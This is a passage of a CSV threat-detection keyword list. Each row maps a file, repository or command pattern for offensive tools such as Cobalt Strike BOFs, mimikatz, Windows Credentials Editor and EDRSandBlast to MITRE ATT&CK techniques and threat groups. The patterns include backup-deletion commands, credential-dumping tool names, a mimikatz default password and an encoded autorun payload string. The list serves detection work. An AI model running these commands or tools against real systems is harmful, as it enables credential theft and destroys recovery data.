APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*vssenum.x86.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*vtiger_crm_upload_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*vulfocus/spring-core-rce-*","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","1","N/A","N/A","4","394","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" +"*vulmon*Vulmap*","offensive_tool_keyword","Vulmap","Vulmap is an open-source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes. It is possible to make vulnerability assessments using these scripts. Also. they can be used for privilege escalation by pentesters/red teamers.","T1210.001 - T1190 - T1059 - T1213","TA0007 - TA0002 - TA0008 - TA0011","N/A","N/A","Vulnerability scanner","https://github.com/vulmon/Vulmap","1","1","N/A","N/A","9","888","196","2023-03-18T23:56:41Z","2018-09-07T15:49:36Z" +"*Vulnerabilities/RPCDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*vulnfactory.org/exploits/*.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*vulns/apache.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*vulns/iis.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*vulns/jrun.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*vulns/tomcat.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*vulnweb.com/FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*vulny-code-static-analysis --dir *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*vu-ls/Crassus*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" +"*vyrus001/go-mimikatz*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/vyrus001/go-mimikatz","1","1","N/A","10","6","593","105","2022-09-08T18:14:20Z","2015-10-22T08:43:38Z" +"*vysecurity*","offensive_tool_keyword","Github Username","github username hosting red team tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/vysecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*vysecurity/ANGRYPUPPY*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" +"*-w *wordlists*.txt*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*w32-speaking-shellcode.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*w32-speaking-shellcode.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*w32-speaking-shellcode-eaf.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*w3af_gui*","offensive_tool_keyword","w3af","w3af is a Web Application Attack and Audit Framework. The projects goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.","T1190 - T1211 - T1220 - T1222 - T1247 - T1592","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://w3af.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*WAF-bypass-Cheat-Sheet*","offensive_tool_keyword","WAF-bypass-Cheat-Sheet","WAF/IPS/DLP bypass Cheat Sheet","T1210 - T1204 - T1061 - T1133 - T1190","TA0001 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet","1","1","N/A","N/A","5","408","64","2018-11-28T20:34:17Z","2018-11-28T19:34:02Z" +"*wafw00f https://*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*wafw00f*","offensive_tool_keyword","wafw00f","To do its magic. WAFW00F does the following Sends a normal HTTP request and analyses the response. this identifies a number of WAF solutions. If that is not successful. it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is. If that is also not successful. it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.","T1210.001 - T1190 - T1589","TA0007 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/EnableSecurity/wafw00f","1","1","N/A","N/A","10","4472","883","2023-06-28T09:24:59Z","2014-05-14T17:08:16Z" +"*wapiti -u*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti.git*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti3-*.tar.gz*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti3-*-any.whl*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti3/bin*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti-getcookie*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wappalyzer.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*warberry*","offensive_tool_keyword","warberry","WarBerryPi is a RaspberryPi based hardware implant that has the ability to go on stealth mode when used in acuiring informational data from a target network. especially useful during read teaming engagements. Its designed with a special feature that allows it to get the needed information within the shortest time possible. WarBerryPis scripts are designed in such way to avoid noise in the network as much as possible.","T1589 - T1539 - T1562","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/secgroundzero/warberry","1","1","N/A","N/A","10","2209","307","2019-11-09T00:09:44Z","2016-05-10T16:25:03Z" +"*warpzoneclient.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.sln*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.vcxproj*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*wavestone-cdt/EDRSandblast*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*wavvs/nanorobeus*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*waza1234*","offensive_tool_keyword","mimikatz","mimikatz exploitation default password","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*WazeHell/sam-the-admin*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078.002 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","1","N/A","N/A","10","929","190","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z" +"*wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest*","greyware_tool_keyword","wbadmin","Wbadmin allows administrators to manage and automate backup and recovery operations in Windows systems. Adversaries may abuse wbadmin to manipulate backups and restore points as part of their evasion tactics. This can include deleting backup files. disabling backup tasks. or tampering with backup configurations to hinder recovery efforts and potentially erase traces of their malicious activities. By interfering with backups. adversaries can make it more challenging for defenders to restore systems and detect their presence.","T1490 - T1562.001","TA0040 - TA0007","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*wbadmin DELETE SYSTEMSTATEBACKUP*","greyware_tool_keyword","wbadmin","Wbadmin allows administrators to manage and automate backup and recovery operations in Windows systems. Adversaries may abuse wbadmin to manipulate backups and restore points as part of their evasion tactics. This can include deleting backup files. disabling backup tasks. or tampering with backup configurations to hinder recovery efforts and potentially erase traces of their malicious activities. By interfering with backups. adversaries can make it more challenging for defenders to restore systems and detect their presence.","T1490 - T1562.001","TA0040 - TA0007","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*wce -i 3e5 -s *","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" +"*wce*getlsasrvaddr.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" +"*wce-master.zip*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" +"*wce-universal.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" +"*wcfrelayserver.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*wcfrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*WCMCredentials.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*wdextract *:\*\*.vdm*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*wdextract *\mrt.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*WDExtract-master*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*wdigest!g_fParameter_UseLogonCredential*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"*wdigest!g_IsCredGuardEnabled*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 